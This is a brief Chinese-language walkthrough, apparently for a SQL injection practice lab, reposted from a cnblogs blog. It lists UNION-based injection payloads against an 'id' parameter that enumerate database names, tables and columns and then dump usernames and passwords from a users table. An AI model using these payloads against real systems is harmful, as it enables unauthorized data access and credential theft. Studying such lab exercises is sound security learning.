输入‘报错,双引号未报错
闭合单引号
使用联合查询判断数据库名
?id=-1‘union select 1,(select group_concat(schema_name)from information_schema.schemata),3 and ‘1‘=‘1
?id=-1‘union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=‘security‘),3 and ‘1‘=‘1
?id=-1‘union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘),3 and ‘1‘=‘1
?id=-1‘union select 1,(select group_concat(username,password)from users),3 and ‘1‘=‘1
原文:https://www.cnblogs.com/observering/p/13722393.html